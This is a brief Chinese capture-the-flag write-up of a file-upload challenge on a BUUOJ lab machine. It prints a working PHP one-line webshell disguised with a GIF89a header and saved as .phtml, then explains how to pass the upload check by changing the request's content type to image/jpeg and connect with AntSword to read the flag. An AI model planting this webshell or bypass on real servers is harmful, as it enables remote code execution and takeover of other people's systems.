一道很简单的文件上传漏洞:
打开靶机看到很直观的页面让我们上传。随便上传一个一句话木马,发现
看来type必须是图片,那我们构建一个phtml
文件
GIF89a
<script language="php">eval($_POST['123']);</script>
在上传的时候抓包,更改类型;image/jpeg
然后盲猜url为/upload
访问http://29f56e21-5b5a-4212-ae3d-6d643a261edf.node3.buuoj.cn/upload/159623.phtml
然后就直接蚁剑(菜刀也行)连接,在根目录发现flag